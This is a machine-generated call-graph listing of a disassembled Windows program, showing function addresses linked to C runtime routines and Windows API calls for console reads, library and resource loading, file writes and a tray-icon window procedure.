95447->95451 95452 da8e71 95448->95452 95453 da90ae 95449->95453 95454 da9005 95449->95454 95450->95449 95455 da901e 95450->95455 95451->95446 95456 da8fe3 ReadConsoleW 95451->95456 95457 da8e7b 95452->95457 95458 da8e96 95452->95458 95515 d9f2d9 20 API calls __dosmaperr 95453->95515 95473 da8e45 __fread_nolock 95454->95473 95512 d9f2a3 20 API calls __dosmaperr 95454->95512 95469 da906c 95455->95469 95470 da9083 95455->95470 95455->95473 95456->95455 95461 da8fff GetLastError 95456->95461 95509 d9f2d9 20 API calls __dosmaperr 95457->95509 95511 da9424 28 API calls __wsopen_s 95458->95511 95461->95454 95462 da29c8 _free 20 API calls 95462->95422 95464 da8e80 95510 d9f2c6 20 API calls __dosmaperr 95464->95510 95465 da90b3 95516 d9f2c6 20 API calls __dosmaperr 95465->95516 95513 da8a61 31 API calls 3 library calls 95469->95513 95472 da909a 95470->95472 95470->95473 95514 da88a1 29 API calls __wsopen_s 95472->95514 95473->95462 95475 da909f 95475->95473 95476->95382 95477->95394 95478->95392 95479->95391 95480->95402 95481->95401 95482->95394 95483->95384 95484->95391 95485->95394 95487 daf8a8 95486->95487 95488 daf8b5 95486->95488 95520 d9f2d9 20 API calls __dosmaperr 95487->95520 95491 daf8c1 95488->95491 95521 d9f2d9 20 API calls __dosmaperr 95488->95521 95490 daf8ad 95490->95441 95491->95441 95493 daf8e2 95522 da27ec 26 API calls _strftime 95493->95522 95495->95416 95496->95422 95497->95426 95498->95425 95499->95434 95500->95440 95501->95473 95502->95439 95504 da29d3 RtlFreeHeap 95503->95504 95505 da29fc __dosmaperr 95503->95505 95504->95505 95506 da29e8 95504->95506 95505->95445 95523 d9f2d9 20 API calls __dosmaperr 95506->95523 95508 da29ee GetLastError 95508->95505 95509->95464 95510->95473 95511->95435 95512->95473 95513->95473 95514->95475 95515->95465 95516->95473 95517->95420 95518->95425 95519->95422 95520->95490 95521->95493 95522->95490 95523->95508 95524 d72e37 95603 d7a961 95524->95603 95528 d72e6b 95622 d73a5a 95528->95622 95530 d72e7f 95629 d79cb3 95530->95629 95535 d72ead 95657 d7a8c7 95535->95657 95536 db2cb0 95677 de2cf9 95536->95677 95538 db2cc3 95540 db2ccf 95538->95540 95703 d74f39 95538->95703 95544 d74f39 68 API calls 95540->95544 95541 d72ec3 95661 d76f88 22 API calls 95541->95661 95546 db2ce5 95544->95546 95545 d72ecf 95547 d79cb3 22 API calls 95545->95547 95709 d73084 22 API calls 95546->95709 95548 d72edc 95547->95548 95662 d7a81b 41 API calls 95548->95662 95551 d72eec 95553 d79cb3 22 API calls 95551->95553 95552 db2d02 95710 d73084 22 API calls 95552->95710 95555 d72f12 95553->95555 95663 d7a81b 41 API calls 95555->95663 95556 db2d1e 95558 d73a5a 24 API calls 95556->95558 95560 db2d44 95558->95560 95559 d72f21 95562 d7a961 22 API calls 95559->95562 95711 d73084 22 API calls 95560->95711 95565 d72f3f 95562->95565 95563 db2d50 95564 d7a8c7 22 API calls 95563->95564 95566 db2d5e 95564->95566 95664 d73084 22 API calls 95565->95664 95712 d73084 22 API calls 95566->95712 95569 d72f4b 95665 d94a28 40 API calls 2 library calls 95569->95665 95570 db2d6d 95574 d7a8c7 22 API calls 95570->95574 95572 d72f59 95572->95546 95573 d72f63 95572->95573 95666 d94a28 40 API calls 2 library calls 95573->95666 95576 db2d83 95574->95576 95713 d73084 22 API calls 95576->95713 95577 d72f6e 95577->95552 95579 d72f78 95577->95579 95667 d94a28 40 API calls 2 library calls 95579->95667 95580 db2d90 95582 d72f83 95582->95556 95583 d72f8d 95582->95583 95668 d94a28 40 API calls 2 library calls 95583->95668 95585 d72f98 95586 d72fdc 95585->95586 95669 d73084 22 API calls 95585->95669 95586->95570 95587 d72fe8 95586->95587 95587->95580 95671 d763eb 22 API calls 95587->95671 95589 d72fbf 95591 d7a8c7 22 API calls 95589->95591 95594 d72fcd 95591->95594 95592 d72ff8 95672 d76a50 22 API calls 95592->95672 95670 d73084 22 API calls 95594->95670 95595 d73006 95673 d770b0 23 API calls 95595->95673 95600 d73021 95601 d73065 95600->95601 95674 d76f88 22 API calls 95600->95674 95675 d770b0 23 API calls 95600->95675 95676 d73084 22 API calls 95600->95676 95714 d8fe0b 95603->95714 95605 d7a976 95724 d8fddb 95605->95724 95607 d72e4d 95608 d74ae3 95607->95608 95609 d74af0 __wsopen_s 95608->95609 95611 d74b22 95609->95611 95752 d76b57 95609->95752 95621 d74b58 95611->95621 95749 d74c6d 95611->95749 95613 d79cb3 22 API calls 95615 d74c52 95613->95615 95614 d79cb3 22 API calls 95614->95621 95616 d7515f 22 API calls 95615->95616 95619 d74c5e 95616->95619 95617 d74c6d 22 API calls 95617->95621 95619->95528 95620 d74c29 95620->95613 95620->95619 95621->95614 95621->95617 95621->95620 95764 d7515f 95621->95764 95781 db1f50 95622->95781 95625 d79cb3 22 API calls 95626 d73a8d 95625->95626 95783 d73aa2 95626->95783 95628 d73a97 95628->95530 95630 d79cc2 _wcslen 95629->95630 95631 d8fe0b 22 API calls 95630->95631 95632 d79cea __fread_nolock 95631->95632 95633 d8fddb 22 API calls 95632->95633 95634 d72e8c 95633->95634 95635 d74ecb 95634->95635 95803 d74e90 LoadLibraryA 95635->95803 95640 d74ef6 LoadLibraryExW 95811 d74e59 LoadLibraryA 95640->95811 95641 db3ccf 95643 d74f39 68 API calls 95641->95643 95645 db3cd6 95643->95645 95646 d74e59 3 API calls 95645->95646 95648 db3cde 95646->95648 95833 d750f5 95648->95833 95649 d74f20 95649->95648 95650 d74f2c 95649->95650 95652 d74f39 68 API calls 95650->95652 95654 d72ea5 95652->95654 95654->95535 95654->95536 95656 db3d05 95658 d7a8ea __fread_nolock 95657->95658 95659 d7a8db 95657->95659 95658->95541 95659->95658 95660 d8fe0b 22 API calls 95659->95660 95660->95658 95661->95545 95662->95551 95663->95559 95664->95569 95665->95572 95666->95577 95667->95582 95668->95585 95669->95589 95670->95586 95671->95592 95672->95595 95673->95600 95674->95600 95675->95600 95676->95600 95678 de2d15 95677->95678 95679 d7511f 64 API calls 95678->95679 95680 de2d29 95679->95680 95985 de2e66 95680->95985 95683 de2d3f 95683->95538 95684 d750f5 40 API calls 95685 de2d56 95684->95685 95686 d750f5 40 API calls 95685->95686 95687 de2d66 95686->95687 95688 d750f5 40 API calls 95687->95688 95689 de2d81 95688->95689 95690 d750f5 40 API calls 95689->95690 95691 de2d9c 95690->95691 95692 d7511f 64 API calls 95691->95692 95693 de2db3 95692->95693 95694 d9ea0c ___std_exception_copy 21 API calls 95693->95694 95695 de2dba 95694->95695 95696 d9ea0c ___std_exception_copy 21 API calls 95695->95696 95697 de2dc4 95696->95697 95698 d750f5 40 API calls 95697->95698 95699 de2dd8 95698->95699 95700 de28fe 27 API calls 95699->95700 95701 de2dee 95700->95701 95701->95683 95991 de22ce 95701->95991 95704 d74f43 95703->95704 95705 d74f4a 95703->95705 95706 d9e678 67 API calls 95704->95706 95707 d74f6a FreeLibrary 95705->95707 95708 d74f59 95705->95708 95706->95705 95707->95708 95708->95540 95709->95552 95710->95556 95711->95563 95712->95570 95713->95580 95716 d8fddb 95714->95716 95717 d8fdfa 95716->95717 95720 d8fdfc 95716->95720 95734 d9ea0c 95716->95734 95741 d94ead 7 API calls 2 library calls 95716->95741 95717->95605 95719 d9066d 95743 d932a4 RaiseException 95719->95743 95720->95719 95742 d932a4 RaiseException 95720->95742 95723 d9068a 95723->95605 95727 d8fde0 95724->95727 95725 d9ea0c ___std_exception_copy 21 API calls 95725->95727 95726 d8fdfa 95726->95607 95727->95725 95727->95726 95730 d8fdfc 95727->95730 95746 d94ead 7 API calls 2 library calls 95727->95746 95729 d9066d 95748 d932a4 RaiseException 95729->95748 95730->95729 95747 d932a4 RaiseException 95730->95747 95733 d9068a 95733->95607 95739 da3820 __dosmaperr 95734->95739 95735 da385e 95745 d9f2d9 20 API calls __dosmaperr 95735->95745 95737 da3849 RtlAllocateHeap 95738 da385c 95737->95738 95737->95739 95738->95716 95739->95735 95739->95737 95744 d94ead 7 API calls 2 library calls 95739->95744 95741->95716 95742->95719 95743->95723 95744->95739 95745->95738 95746->95727 95747->95729 95748->95733 95770 d7aec9 95749->95770 95751 d74c78 95751->95611 95753 d76b67 _wcslen 95752->95753 95754 db4ba1 95752->95754 95757 d76ba2 95753->95757 95758 d76b7d 95753->95758 95777 d793b2 95754->95777 95756 db4baa 95756->95756 95759 d8fddb 22 API calls 95757->95759 95776 d76f34 22 API calls 95758->95776 95762 d76bae 95759->95762 95761 d76b85 __fread_nolock 95761->95611 95763 d8fe0b 22 API calls 95762->95763 95763->95761 95765 d7516e 95764->95765 95769 d7518f __fread_nolock 95764->95769 95767 d8fe0b 22 API calls 95765->95767 95766 d8fddb 22 API calls 95768 d751a2 95766->95768 95767->95769 95768->95621 95769->95766 95771 d7aedc 95770->95771 95772 d7aed9 __fread_nolock 95770->95772 95773 d8fddb 22 API calls 95771->95773 95772->95751 95774 d7aee7 95773->95774 95775 d8fe0b 22 API calls 95774->95775 95775->95772 95776->95761 95778 d793c0 95777->95778 95779 d793c9 __fread_nolock 95777->95779 95778->95779 95780 d7aec9 22 API calls 95778->95780 95779->95756 95779->95779 95780->95779 95782 d73a67 GetModuleFileNameW 95781->95782 95782->95625 95784 db1f50 __wsopen_s 95783->95784 95785 d73aaf GetFullPathNameW 95784->95785 95786 d73ace 95785->95786 95787 d73ae9 95785->95787 95789 d76b57 22 API calls 95786->95789 95797 d7a6c3 95787->95797 95790 d73ada 95789->95790 95793 d737a0 95790->95793 95794 d737ae 95793->95794 95795 d793b2 22 API calls 95794->95795 95796 d737c2 95795->95796 95796->95628 95798 d7a6d0 95797->95798 95799 d7a6dd 95797->95799 95798->95790 95800 d8fddb 22 API calls 95799->95800 95801 d7a6e7 95800->95801 95802 d8fe0b 22 API calls 95801->95802 95802->95798 95804 d74ec6 95803->95804 95805 d74ea8 GetProcAddress 95803->95805 95808 d9e5eb 95804->95808 95806 d74eb8 95805->95806 95806->95804 95807 d74ebf FreeLibrary 95806->95807 95807->95804 95841 d9e52a 95808->95841 95810 d74eea 95810->95640 95810->95641 95812 d74e6e GetProcAddress 95811->95812 95813 d74e8d 95811->95813 95814 d74e7e 95812->95814 95816 d74f80 95813->95816 95814->95813 95815 d74e86 FreeLibrary 95814->95815 95815->95813 95817 d8fe0b 22 API calls 95816->95817 95818 d74f95 95817->95818 95895 d75722 95818->95895 95820 d74fa1 __fread_nolock 95821 d750a5 95820->95821 95822 db3d1d 95820->95822 95832 d74fdc 95820->95832 95898 d742a2 CreateStreamOnHGlobal 95821->95898 95909 de304d 74 API calls 95822->95909 95825 db3d22 95827 d7511f 64 API calls 95825->95827 95826 d750f5 40 API calls 95826->95832 95828 db3d45 95827->95828 95829 d750f5 40 API calls 95828->95829 95831 d7506e messages 95829->95831 95831->95649 95832->95825 95832->95826 95832->95831 95904 d7511f 95832->95904 95834 d75107 95833->95834 95835 db3d70 95833->95835 95931 d9e8c4 95834->95931 95838 de28fe 95968 de274e 95838->95968 95840 de2919 95840->95656 95844 d9e536 ___BuildCatchObject 95841->95844 95842 d9e544 95866 d9f2d9 20 API calls __dosmaperr 95842->95866 95844->95842 95846 d9e574 95844->95846 95845 d9e549 95867 da27ec 26 API calls _strftime 95845->95867 95848 d9e579 95846->95848 95849 d9e586 95846->95849 95868 d9f2d9 20 API calls __dosmaperr 95848->95868 95858 da8061 95849->95858 95852 d9e58f 95853 d9e5a2 95852->95853 95854 d9e595 95852->95854 95870 d9e5d4 LeaveCriticalSection __fread_nolock 95853->95870 95869 d9f2d9 20 API calls __dosmaperr 95854->95869 95855 d9e554 __fread_nolock 95855->95810 95859 da806d ___BuildCatchObject 95858->95859 95871 da2f5e EnterCriticalSection 95859->95871 95861 da807b 95872 da80fb 95861->95872 95865 da80ac __fread_nolock 95865->95852 95866->95845 95867->95855 95868->95855 95869->95855 95870->95855 95871->95861 95879 da811e 95872->95879 95873 da8088 95886 da80b7 95873->95886 95874 da8177 95891 da4c7d 20 API calls __dosmaperr 95874->95891 95876 da8180 95878 da29c8 _free 20 API calls 95876->95878 95880 da8189 95878->95880 95879->95873 95879->95874 95889 d9918d EnterCriticalSection 95879->95889 95890 d991a1 LeaveCriticalSection 95879->95890 95880->95873 95892 da3405 11 API calls 2 library calls 95880->95892 95883 da81a8 95893 d9918d EnterCriticalSection 95883->95893 95885 da81bb 95885->95873 95894 da2fa6 LeaveCriticalSection 95886->95894 95888 da80be 95888->95865 95889->95879 95890->95879 95891->95876 95892->95883 95893->95885 95894->95888 95896 d8fddb 22 API calls 95895->95896 95897 d75734 95896->95897 95897->95820 95899 d742bc FindResourceExW 95898->95899 95903 d742d9 95898->95903 95900 db35ba LoadResource 95899->95900 95899->95903 95901 db35cf SizeofResource 95900->95901 95900->95903 95902 db35e3 LockResource 95901->95902 95901->95903 95902->95903 95903->95832 95905 d7512e 95904->95905 95906 db3d90 95904->95906 95910 d9ece3 95905->95910 95909->95825 95913 d9eaaa 95910->95913 95912 d7513c 95912->95832 95916 d9eab6 ___BuildCatchObject 95913->95916 95914 d9eac2 95926 d9f2d9 20 API calls __dosmaperr 95914->95926 95915 d9eae8 95928 d9918d EnterCriticalSection 95915->95928 95916->95914 95916->95915 95919 d9eac7 95927 da27ec 26 API calls _strftime 95919->95927 95920 d9eaf4 95929 d9ec0a 62 API calls 2 library calls 95920->95929 95923 d9eb08 95930 d9eb27 LeaveCriticalSection __fread_nolock 95923->95930 95925 d9ead2 __fread_nolock 95925->95912 95926->95919 95927->95925 95928->95920 95929->95923 95930->95925 95934 d9e8e1 95931->95934 95933 d75118 95933->95838 95935 d9e8ed ___BuildCatchObject 95934->95935 95936 d9e92d 95935->95936 95937 d9e900 ___scrt_fastfail 95935->95937 95938 d9e925 __fread_nolock 95935->95938 95947 d9918d EnterCriticalSection 95936->95947 95961 d9f2d9 20 API calls __dosmaperr 95937->95961 95938->95933 95941 d9e937 95948 d9e6f8 95941->95948 95942 d9e91a 95962 da27ec 26 API calls _strftime 95942->95962 95947->95941 95951 d9e70a ___scrt_fastfail 95948->95951 95953 d9e727 95948->95953 95949 d9e717 95964 d9f2d9 20 API calls __dosmaperr 95949->95964 95951->95949 95951->95953 95960 d9e76a __fread_nolock 95951->95960 95963 d9e96c LeaveCriticalSection __fread_nolock 95953->95963 95954 d9e886 ___scrt_fastfail 95967 d9f2d9 20 API calls __dosmaperr 95954->95967 95956 d9d955 __fread_nolock 26 API calls 95956->95960 95958 d9e71c 95965 da27ec 26 API calls _strftime 95958->95965 95959 da8d45 __fread_nolock 38 API calls 95959->95960 95960->95953 95960->95954 95960->95956 95960->95959 95966 d9cf78 26 API calls 4 library calls 95960->95966 95961->95942 95962->95938 95963->95938 95964->95958 95965->95953 95966->95960 95967->95958 95971 d9e4e8 95968->95971 95970 de275d 95970->95840 95974 d9e469 95971->95974 95973 d9e505 95973->95970 95975 d9e478 95974->95975 95976 d9e48c 95974->95976 95982 d9f2d9 20 API calls __dosmaperr 95975->95982 95981 d9e488 __alldvrm 95976->95981 95984 da333f 11 API calls 2 library calls 95976->95984 95979 d9e47d 95983 da27ec 26 API calls _strftime 95979->95983 95981->95973 95982->95979 95983->95981 95984->95981 95989 de2e7a 95985->95989 95986 d750f5 40 API calls 95986->95989 95987 de28fe 27 API calls 95987->95989 95988 de2d3b 95988->95683 95988->95684 95989->95986 95989->95987 95989->95988 95990 d7511f 64 API calls 95989->95990 95990->95989 95992 de22e7 95991->95992 95993 de22d9 95991->95993 95995 de232c 95992->95995 95996 d9e5eb 29 API calls 95992->95996 96014 de22f0 95992->96014 95994 d9e5eb 29 API calls 95993->95994 95994->95992 96020 de2557 95995->96020 95997 de2311 95996->95997 95997->95995 95999 de231a 95997->95999 96003 d9e678 67 API calls 95999->96003 95999->96014 96000 de2370 96001 de2374 96000->96001 96002 de2395 96000->96002 96005 de2381 96001->96005 96007 d9e678 67 API calls 96001->96007 96024 de2171 96002->96024 96003->96014 96008 d9e678 67 API calls 96005->96008 96005->96014 96006 de239d 96009 de23c3 96006->96009 96010 de23a3 96006->96010 96007->96005 96008->96014 96031 de23f3 96009->96031 96012 de23b0 96010->96012 96013 d9e678 67 API calls 96010->96013 96012->96014 96015 d9e678 67 API calls 96012->96015 96013->96012 96014->95683 96015->96014 96016 de23de 96016->96014 96019 d9e678 67 API calls 96016->96019 96017 de23ca 96017->96016 96039 d9e678 96017->96039 96019->96014 96021 de257c 96020->96021 96023 de2565 __fread_nolock 96020->96023 96022 d9e8c4 __fread_nolock 40 API calls 96021->96022 96022->96023 96023->96000 96025 d9ea0c ___std_exception_copy 21 API calls 96024->96025 96026 de217f 96025->96026 96027 d9ea0c ___std_exception_copy 21 API calls 96026->96027 96028 de2190 96027->96028 96029 d9ea0c ___std_exception_copy 21 API calls 96028->96029 96030 de219c 96029->96030 96030->96006 96035 de2408 96031->96035 96032 de24c0 96056 de2724 96032->96056 96033 de21cc 40 API calls 96033->96035 96035->96032 96035->96033 96038 de24c7 96035->96038 96052 de2606 96035->96052 96060 de2269 40 API calls 96035->96060 96038->96017 96040 d9e684 ___BuildCatchObject 96039->96040 96041 d9e6aa 96040->96041 96042 d9e695 96040->96042 96051 d9e6a5 __fread_nolock 96041->96051 96117 d9918d EnterCriticalSection 96041->96117 96134 d9f2d9 20 API calls __dosmaperr 96042->96134 96044 d9e69a 96135 da27ec 26 API calls _strftime 96044->96135 96046 d9e6c6 96118 d9e602 96046->96118 96049 d9e6d1 96136 d9e6ee LeaveCriticalSection __fread_nolock 96049->96136 96051->96016 96053 de261d 96052->96053 96055 de2617 96052->96055 96053->96035 96053->96053 96055->96053 96061 de26d7 96055->96061 96057 de2742 96056->96057 96058 de2731 96056->96058 96057->96038 96059 d9dbb3 65 API calls 96058->96059 96059->96057 96060->96035 96062 de2714 96061->96062 96063 de2703 96061->96063 96062->96055 96065 d9dbb3 96063->96065 96066 d9dbdd 96065->96066 96067 d9dbc1 96065->96067 96066->96062 96067->96066 96068 d9dbcd 96067->96068 96069 d9dbe3 96067->96069 96077 d9f2d9 20 API calls __dosmaperr 96068->96077 96074 d9d9cc 96069->96074 96072 d9dbd2 96078 da27ec 26 API calls _strftime 96072->96078 96079 d9d97b 96074->96079 96076 d9d9f0 96076->96066 96077->96072 96078->96066 96080 d9d987 ___BuildCatchObject 96079->96080 96087 d9918d EnterCriticalSection 96080->96087 96082 d9d995 96088 d9d9f4 96082->96088 96086 d9d9b3 __fread_nolock 96086->96076 96087->96082 96096 da49a1 96088->96096 96094 d9d9a2 96095 d9d9c0 LeaveCriticalSection __fread_nolock 96094->96095 96095->96086 96097 d9d955 __fread_nolock 26 API calls 96096->96097 96098 da49b0 96097->96098 96099 daf89b __fread_nolock 26 API calls 96098->96099 96100 da49b6 96099->96100 96101 da3820 _strftime 21 API calls 96100->96101 96104 d9da09 96100->96104 96102 da4a15 96101->96102 96103 da29c8 _free 20 API calls 96102->96103 96103->96104 96105 d9da3a 96104->96105 96106 d9da4c 96105->96106 96111 d9da24 96105->96111 96107 d9da5a 96106->96107 96106->96111 96115 d9da85 __fread_nolock 96106->96115 96108 d9f2d9 __dosmaperr 20 API calls 96107->96108 96109 d9da5f 96108->96109 96110 da27ec _strftime 26 API calls 96109->96110 96110->96111 96116 da4a56 62 API calls 96111->96116 96112 d9dc0b 62 API calls 96112->96115 96113 d9d955 __fread_nolock 26 API calls 96113->96115 96114 da59be __wsopen_s 62 API calls 96114->96115 96115->96111 96115->96112 96115->96113 96115->96114 96116->96094 96117->96046 96119 d9e60f 96118->96119 96120 d9e624 96118->96120 96162 d9f2d9 20 API calls __dosmaperr 96119->96162 96126 d9e61f 96120->96126 96137 d9dc0b 96120->96137 96123 d9e614 96163 da27ec 26 API calls _strftime 96123->96163 96126->96049 96129 d9d955 __fread_nolock 26 API calls 96130 d9e646 96129->96130 96147 da862f 96130->96147 96133 da29c8 _free 20 API calls 96133->96126 96134->96044 96135->96051 96136->96051 96138 d9dc1f 96137->96138 96139 d9dc23 96137->96139 96143 da4d7a 96138->96143 96139->96138 96140 d9d955 __fread_nolock 26 API calls 96139->96140 96141 d9dc43 96140->96141 96164 da59be 96141->96164 96144 da4d90 96143->96144 96145 d9e640 96143->96145 96144->96145 96146 da29c8 _free 20 API calls 96144->96146 96145->96129 96146->96145 96148 da863e 96147->96148 96149 da8653 96147->96149 96287 d9f2c6 20 API calls __dosmaperr 96148->96287 96151 da868e 96149->96151 96154 da867a 96149->96154 96289 d9f2c6 20 API calls __dosmaperr 96151->96289 96153 da8643 96288 d9f2d9 20 API calls __dosmaperr 96153->96288 96284 da8607 96154->96284 96155 da8693 96290 d9f2d9 20 API calls __dosmaperr 96155->96290 96159 d9e64c 96159->96126 96159->96133 96160 da869b 96291 da27ec 26 API calls _strftime 96160->96291 96162->96123 96163->96126 96165 da59ca ___BuildCatchObject 96164->96165 96166 da59ea 96165->96166 96167 da59d2 96165->96167 96169 da5a88 96166->96169 96174 da5a1f 96166->96174 96243 d9f2c6 20 API calls __dosmaperr 96167->96243 96248 d9f2c6 20 API calls __dosmaperr 96169->96248 96170 da59d7 96244 d9f2d9 20 API calls __dosmaperr 96170->96244 96173 da5a8d 96249 d9f2d9 20 API calls __dosmaperr 96173->96249 96189 da5147 EnterCriticalSection 96174->96189 96177 da5a95 96250 da27ec 26 API calls _strftime 96177->96250 96178 da5a25 96180 da5a41 96178->96180 96181 da5a56 96178->96181 96245 d9f2d9 20 API calls __dosmaperr 96180->96245 96190 da5aa9 96181->96190 96182 da59df __fread_nolock 96182->96138 96185 da5a51 96247 da5a80 LeaveCriticalSection __wsopen_s 96185->96247 96186 da5a46 96246 d9f2c6 20 API calls __dosmaperr 96186->96246 96189->96178 96191 da5ad7 96190->96191 96230 da5ad0 96190->96230 96192 da5afa 96191->96192 96193 da5adb 96191->96193 96196 da5b4b 96192->96196 96197 da5b2e 96192->96197 96258 d9f2c6 20 API calls __dosmaperr 96193->96258 96201 da5b61 96196->96201 96264 da9424 28 API calls __wsopen_s 96196->96264 96261 d9f2c6 20 API calls __dosmaperr 96197->96261 96198 da5cb1 96198->96185 96199 da5ae0 96259 d9f2d9 20 API calls __dosmaperr 96199->96259 96251 da564e 96201->96251 96203 da5b33 96262 d9f2d9 20 API calls __dosmaperr 96203->96262 96205 da5ae7 96260 da27ec 26 API calls _strftime 96205->96260 96210 da5ba8 96216 da5bbc 96210->96216 96217 da5c02 WriteFile 96210->96217 96211 da5b6f 96213 da5b73 96211->96213 96214 da5b95 96211->96214 96212 da5b3b 96263 da27ec 26 API calls _strftime 96212->96263 96218 da5c69 96213->96218 96265 da55e1 GetLastError WriteConsoleW CreateFileW __wsopen_s 96213->96265 96266 da542e 45 API calls 3 library calls 96214->96266 96221 da5bf2 96216->96221 96222 da5bc4 96216->96222 96220 da5c25 GetLastError 96217->96220 96225 da5b8b 96217->96225 96218->96230 96273 d9f2d9 20 API calls __dosmaperr 96218->96273 96220->96225 96269 da56c4 7 API calls 2 library calls 96221->96269 96226 da5bc9 96222->96226 96227 da5be2 96222->96227 96225->96218 96225->96230 96234 da5c45 96225->96234 96226->96218 96232 da5bd2 96226->96232 96268 da5891 8 API calls 2 library calls 96227->96268 96229 da5be0 96229->96225 96275 d90a8c 96230->96275 96267 da57a3 7 API calls 2 library calls 96232->96267 96233 da5c8e 96274 d9f2c6 20 API calls __dosmaperr 96233->96274 96237 da5c4c 96234->96237 96238 da5c60 96234->96238 96270 d9f2d9 20 API calls __dosmaperr 96237->96270 96272 d9f2a3 20 API calls __dosmaperr 96238->96272 96241 da5c51 96271 d9f2c6 20 API calls __dosmaperr 96241->96271 96243->96170 96244->96182 96245->96186 96246->96185 96247->96182 96248->96173 96249->96177 96250->96182 96252 daf89b __fread_nolock 26 API calls 96251->96252 96253 da565e 96252->96253 96254 da5663 96253->96254 96282 da2d74 38 API calls 3 library calls 96253->96282 96254->96210 96254->96211 96256 da5686 96256->96254 96257 da56a4 GetConsoleMode 96256->96257 96257->96254 96258->96199 96259->96205 96260->96230 96261->96203 96262->96212 96263->96230 96264->96201 96265->96225 96266->96225 96267->96229 96268->96229 96269->96229 96270->96241 96271->96230 96272->96230 96273->96233 96274->96230 96276 d90a95 96275->96276 96277 d90a97 IsProcessorFeaturePresent 96275->96277 96276->96198 96279 d90c5d 96277->96279 96283 d90c21 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 96279->96283 96281 d90d40 96281->96198 96282->96256 96283->96281 96292 da8585 96284->96292 96286 da862b 96286->96159 96287->96153 96288->96159 96289->96155 96290->96160 96291->96159 96293 da8591 ___BuildCatchObject 96292->96293 96303 da5147 EnterCriticalSection 96293->96303 96295 da859f 96296 da85d1 96295->96296 96297 da85c6 96295->96297 96319 d9f2d9 20 API calls __dosmaperr 96296->96319 96304 da86ae 96297->96304 96300 da85cc 96320 da85fb LeaveCriticalSection __wsopen_s 96300->96320 96302 da85ee __fread_nolock 96302->96286 96303->96295 96321 da53c4 96304->96321 96306 da86c4 96334 da5333 21 API calls 2 library calls 96306->96334 96308 da86be 96308->96306 96309 da86f6 96308->96309 96311 da53c4 __wsopen_s 26 API calls 96308->96311 96309->96306 96312 da53c4 __wsopen_s 26 API calls 96309->96312 96310 da871c 96314 da873e 96310->96314 96335 d9f2a3 20 API calls __dosmaperr 96310->96335 96315 da86ed 96311->96315 96313 da8702 FindCloseChangeNotification 96312->96313 96313->96306 96316 da870e GetLastError 96313->96316 96314->96300 96318 da53c4 __wsopen_s 26 API calls 96315->96318 96316->96306 96318->96309 96319->96300 96320->96302 96322 da53d1 96321->96322 96323 da53e6 96321->96323 96336 d9f2c6 20 API calls __dosmaperr 96322->96336 96328 da540b 96323->96328 96338 d9f2c6 20 API calls __dosmaperr 96323->96338 96325 da53d6 96337 d9f2d9 20 API calls __dosmaperr 96325->96337 96328->96308 96329 da5416 96339 d9f2d9 20 API calls __dosmaperr 96329->96339 96331 da53de 96331->96308 96332 da541e 96340 da27ec 26 API calls _strftime 96332->96340 96334->96310 96335->96314 96336->96325 96337->96331 96338->96329 96339->96332 96340->96331 96341 d73156 96344 d73170 96341->96344 96345 d73187 96344->96345 96346 d7318c 96345->96346 96347 d731eb 96345->96347 96388 d731e9 96345->96388 96348 d73265 PostQuitMessage 96346->96348 96349 d73199 96346->96349 96351 db2dfb 96347->96351 96352 d731f1 96347->96352 96385 d7316a 96348->96385 96354 d731a4 96349->96354 96355 db2e7c 96349->96355 96350 d731d0 DefWindowProcW 96350->96385 96393 d718e2 10 API calls 96351->96393 96356 d7321d SetTimer RegisterWindowMessageW 96352->96356 96357 d731f8 96352->96357 96359 db2e68 96354->96359 96360 d731ae 96354->96360 96408 ddbf30 34 API calls ___scrt_fastfail 96355->96408 96361 d73246 CreatePopupMenu 96356->96361 96356->96385 96363 d73201 KillTimer 96357->96363 96364 db2d9c 96357->96364 96358 db2e1c 96394 d8e499 42 API calls 96358->96394 96407 ddc161 27 API calls ___scrt_fastfail 96359->96407 96367 db2e4d 96360->96367 96368 d731b9 96360->96368 96361->96385 96389 d730f2 Shell_NotifyIconW ___scrt_fastfail 96363->96389 96370 db2da1 96364->96370 96371 db2dd7 MoveWindow 96364->96371 96367->96350 96406 dd0ad7 22 API calls 96367->96406 96374 d73253 96368->96374 96382 d731c4 96368->96382 96369 db2e8e 96369->96350 96369->96385 96375 db2da7 96370->96375 96376 db2dc6 SetFocus 96370->96376 96371->96385 96373 d73214 96390 d73c50 DeleteObject DestroyWindow 96373->96390 96391 d7326f 44 API calls ___scrt_fastfail 96374->96391 96379 db2db0 96375->96379 96375->96382 96376->96385 96392 d718e2 10 API calls 96379->96392 96381 d73263 96381->96385 96382->96350 96395 d730f2 Shell_NotifyIconW ___scrt_fastfail 96382->96395 96386 db2e41 96396 d73837 96386->96396 96388->96350 96389->96373 96390->96385 96391->96381 96392->96385 96393->96358 96394->96382 96395->96386 96397 d73862 ___scrt_fastfail 96396->96397 96409 d74212 96397->96409 96401 d738e8 96402 d73906 Shell_NotifyIconW 96401->96402 96403 db3386 Shell_NotifyIconW 96401->96403 96413 d73923 96402->96413 96405 d7391c 96405->96388 96406->96388 96407->96381 96408->96369 96410 d738b7 96409->96410 96411 db35a4 96409->96411 96410->96401 96435 ddc874 42 API calls _strftime 96410->96435 96411->96410 96412 db35ad DestroyIcon 96411->96412 96412->96410 96414 d73a13 96413->96414 96415 d7393f 96413->96415 96414->96405 96436 d76270 96415->96436 96418 db3393 LoadStringW 96421 db33ad 96418->96421 96419 d7395a 96420 d76b57 22 API calls 96419->96420 96422 d7396f 96420->96422 96425 d7a8c7 22 API calls 96421->96425 96429 d73994 ___scrt_fastfail 96421->96429 96423 db33c9 96422->96423 96424 d7397c 96422->96424 96427 d76350 22 API calls 96423->96427 96424->96421 96426 d73986 96424->96426 96425->96429 96441 d76350 96426->96441 96430 db33d7 96427->96430 96431 d739f9 Shell_NotifyIconW 96429->96431 96430->96429 96450 d733c6 96430->96450 96431->96414 96433 db33f9 96434 d733c6 22 API calls 96433->96434 96434->96429 96435->96401 96437 d8fe0b 22 API calls 96436->96437 96438 d76295 96437->96438 96439 d8fddb 22 API calls 96438->96439 96440 d7394d 96439->96440 96440->96418 96440->96419 96442 d76362 96441->96442 96443 db4a51 96441->96443 96459 d76373 96442->96459 96469 d74a88 22 API calls __fread_nolock 96443->96469 96446 d7636e 96446->96429 96447 db4a5b 96448 d7a8c7 22 API calls 96447->96448 96449 db4a67 96447->96449 96448->96449 96451 db30bb 96450->96451 96452 d733dd 96450->96452 96454 d8fddb 22 API calls 96451->96454 96475 d733ee 96452->96475 96456 db30c5 _wcslen 96454->96456 96455 d733e8 96455->96433 96457 d8fe0b 22 API 